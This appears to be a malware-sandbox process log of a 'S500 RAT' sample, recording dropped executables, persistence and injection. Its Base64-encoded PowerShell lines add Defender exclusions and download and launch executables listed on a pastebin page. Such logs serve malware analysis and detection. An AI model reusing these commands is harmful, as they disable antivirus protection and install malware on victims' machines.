"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2216 --field-trial-handle=1900,i,15704487358648870758,3768290661746675541,131072 /prefetch:8
2⤵
PID:3924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=1900,i,15704487358648870758,3768290661746675541,131072 /prefetch:1
2⤵
PID:888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3048 --field-trial-handle=1900,i,15704487358648870758,3768290661746675541,131072 /prefetch:1
2⤵
PID:2532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 --field-trial-handle=1900,i,15704487358648870758,3768290661746675541,131072 /prefetch:8
2⤵
PID:3684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4460 --field-trial-handle=1900,i,15704487358648870758,3768290661746675541,131072 /prefetch:8
2⤵
PID:2104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2292 --field-trial-handle=1900,i,15704487358648870758,3768290661746675541,131072 /prefetch:8
2⤵
PID:892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4984 --field-trial-handle=1900,i,15704487358648870758,3768290661746675541,131072 /prefetch:8
2⤵
PID:2080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 --field-trial-handle=1900,i,15704487358648870758,3768290661746675541,131072 /prefetch:8
2⤵
PID:4692

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4520

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x498 0x448
1⤵
PID:1628

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:448

C:\Users\Admin\Desktop\S500 RAT\crack.exe
"C:\Users\Admin\Desktop\S500 RAT\crack.exe"
1⤵
- Suspicious use of SetThreadContext
PID:3392

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:4204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:3524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3392 -s 296
2⤵
- Program crash
PID:2992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3392 -ip 3392
1⤵
PID:4436

C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:4028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAdwBiACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4480

C:\Users\Admin\w00ieq6n.exe
"C:\Users\Admin\w00ieq6n.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:1164

C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4364

C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
4⤵
PID:2952

C:\Windows\S500RAT.exe
"C:\Windows\S500RAT.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1956

C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:1492

C:\Users\Admin\AppData\Local\Temp\blackCC.exe
"C:\Users\Admin\AppData\Local\Temp\blackCC.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
PID:5032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5000

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 444
5⤵
- Program crash
PID:4376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 280
4⤵
- Program crash
PID:812

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4472 -ip 4472
1⤵
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1512 -ip 1512
1⤵
PID:1284

C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:5088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAdwBiACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:468

C:\Users\Admin\w00ieq6n.exe
"C:\Users\Admin\w00ieq6n.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:2428

C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3440

C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
4⤵
PID:2404

C:\Windows\S500RAT.exe
"C:\Windows\S500RAT.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2364

C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:3308

C:\Users\Admin\AppData\Local\Temp\blackCC.exe
"C:\Users\Admin\AppData\Local\Temp\blackCC.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
PID:1384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4028

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:2884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 444
5⤵
- Program crash
PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 152
4⤵
- Program crash
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2016 -ip 2016
1⤵
PID:3872

C:\Users\Admin\Desktop\S500 RAT\crack.exe
"C:\Users\Admin\Desktop\S500 RAT\crack.exe"
1⤵
- Suspicious use of SetThreadContext
PID:1396

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:5008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 444
3⤵
- Program crash
PID:1432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 224
2⤵
- Program crash
PID:3304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1396 -ip 1396
1⤵
PID:1688

C:\Users\Admin\Desktop\S500 RAT\crack.exe
"C:\Users\Admin\Desktop\S500 RAT\crack.exe"
1⤵
- Suspicious use of SetThreadContext
PID:1132

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:2704

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4064 -s 448
3⤵
- Program crash
PID:3696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 152
2⤵
- Program crash
PID:4612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2884 -ip 2884
1⤵
PID:3812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1132 -ip 1132
1⤵
PID:3308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5008 -ip 5008
1⤵
PID:1740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4064 -ip 4064
1⤵
PID:4084

C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:4076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAdwBiACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3972

C:\Users\Admin\w00ieq6n.exe
"C:\Users\Admin\w00ieq6n.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:2016

C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4936

C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
4⤵
PID:2232

C:\Windows\S500RAT.exe
"C:\Windows\S500RAT.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2008

C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:3472

C:\Users\Admin\AppData\Local\Temp\blackCC.exe
"C:\Users\Admin\AppData\Local\Temp\blackCC.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
PID:4664

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:2204

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:892

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:2480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 448
5⤵
- Program crash
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 136
4⤵
- Program crash
PID:880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 892 -ip 892
1⤵
PID:2760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2480 -ip 2480
1⤵
PID:3088

C:\Users\Admin\Desktop\S500 RAT\crack.exe
"C:\Users\Admin\Desktop\S500 RAT\crack.exe"
1⤵
- Suspicious use of SetThreadContext
PID:1388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:1160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 444
3⤵
- Program crash
PID:4244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1388 -s 152
2⤵
- Program crash
PID:180

C:\Users\Admin\Desktop\S500 RAT\crack.exe
"C:\Users\Admin\Desktop\S500 RAT\crack.exe"
1⤵
- Suspicious use of SetThreadContext
PID:3784

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:4604

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:4404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 444
3⤵
- Program crash
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 236
2⤵
- Program crash
PID:4640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1388 -ip 1388
1⤵
PID:3724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3784 -ip 3784
1⤵
PID:1364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1160 -ip 1160
1⤵
PID:1556

C:\Users\Admin\Desktop\S500 RAT\crack.exe
"C:\Users\Admin\Desktop\S500 RAT\crack.exe"
1⤵
- Suspicious use of SetThreadContext
PID:4076

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 444
3⤵
- Program crash
PID:2600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 152
2⤵
- Program crash
PID:880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4404 -ip 4404
1⤵
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4076 -ip 4076
1⤵
PID:3884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3768 -ip 3768
1⤵
PID:4548

C:\Users\Admin\Desktop\S500 RAT\crack.exe
"C:\Users\Admin\Desktop\S500 RAT\crack.exe"
1⤵
- Suspicious use of SetThreadContext
PID:1260

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:3024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 448
3⤵
- Program crash
PID:3872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 248
2⤵
- Program crash
PID:4292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1260 -ip 1260
1⤵
PID:3492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3024 -ip 3024
1⤵
PID:3564

C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe
